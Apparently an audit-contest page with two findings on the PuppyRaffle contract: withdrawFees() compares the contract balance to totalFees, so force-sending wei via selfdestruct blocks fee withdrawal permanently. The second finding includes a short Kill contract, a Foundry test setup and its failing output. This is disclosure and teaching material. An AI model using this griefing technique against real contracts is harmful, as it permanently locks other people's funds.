withdrawFees() requires balance == totalFees, so anyone can force-send wei to permanently brick fee withdrawals
Root + Impact
Description
withdrawFees() gates withdrawal on the contract's ETH balance being exactly equal to totalFees:
address(this).balance can be increased by anyone without going through enterRaffle - e.g. via selfdestruct(payable(puppyRaffle)) or a pre-computed deployment - and such forced ETH is not tracked in totalFees. After even 1 wei is force-sent, balance != totalFees forever, so the require always reverts and the fees can never be withdrawn. This is a permanent, unrecoverable denial of service on the protocol's fee revenue, triggerable by anyone for ~0 cost.
Risk
Likelihood: High - any external actor can selfdestruct ETH into the contract at negligible cost; there is no way to prevent forced ETH transfers.
Impact: Medium - all accrued protocol fees become permanently locked (loss of protocol revenue), though user prize funds are unaffected.
Proof of Concept
After a normal raffle accrues fees, an attacker force-sends 1 wei via selfdestruct, and withdrawFees() then reverts forever. Runnable Foundry test (add to PuppyRaffleTest.t.sol):
Run forge test --mt test_PoC_withdrawFeesDoS -vv; it passes - withdrawFees reverts after the forced transfer.
Recommended Mitigation
Track withdrawable fees with internal accounting instead of comparing to the contract balance; never rely on address(this).balance for control flow:
Lead Judging Commences
[M-02] Slightly increasing puppyraffle's contract balance will render `withdrawFees` function useless
## Description An attacker can slightly change the eth balance of the contract to break the `withdrawFees` function. ## Vulnerability Details The withdraw function contains the following check: ``` require(address(this).balance == uint256(totalFees), "PuppyRaffle: There are currently players active!"); ``` Using `address(this).balance` in this way invites attackers to modify said balance in order to make this check fail. This can be easily done as follows: Add this contract above `PuppyRaffleTest`: ``` contract Kill { constructor (address target) payable { address payable _target = payable(target); selfdestruct(_target); } } ``` Modify `setUp` as follows: ``` function setUp() public { puppyRaffle = new PuppyRaffle( entranceFee, feeAddress, duration ); address mAlice = makeAddr("mAlice"); vm.deal(mAlice, 1 ether); vm.startPrank(mAlice); Kill kill = new Kill{value: 0.01 ether}(address(puppyRaffle)); vm.stopPrank(); } ``` Now run `testWithdrawFees()` - ` forge test --mt testWithdrawFees` to get: ``` Running 1 test for test/PuppyRaffleTest.t.sol:PuppyRaffleTest [FAIL. Reason: PuppyRaffle: There are currently players active!] testWithdrawFees() (gas: 361718) Test result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 3.40ms ``` Any small amount sent over by a self destructing contract will make `withdrawFees` function unusable, leaving no other way of taking the fees out of the contract. ## Impact All fees that weren't withdrawn and all future fees are stuck in the contract. ## Recommendations Avoid using `address(this).balance` in this way as it can easily be changed by an attacker. Properly track the `totalFees` and withdraw it. ```diff function withdrawFees() external { -- require(address(this).balance == uint256(totalFees), "PuppyRaffle: There are currently players active!"); uint256 feesToWithdraw = totalFees; totalFees = 0; (bool success,) = feeAddress.call{value: feesToWithdraw}(""); require(success, "PuppyRaffle: Failed to withdraw fees"); } ```
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Judging
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsRewards Distribution
The contest is complete and the rewards are being distributed.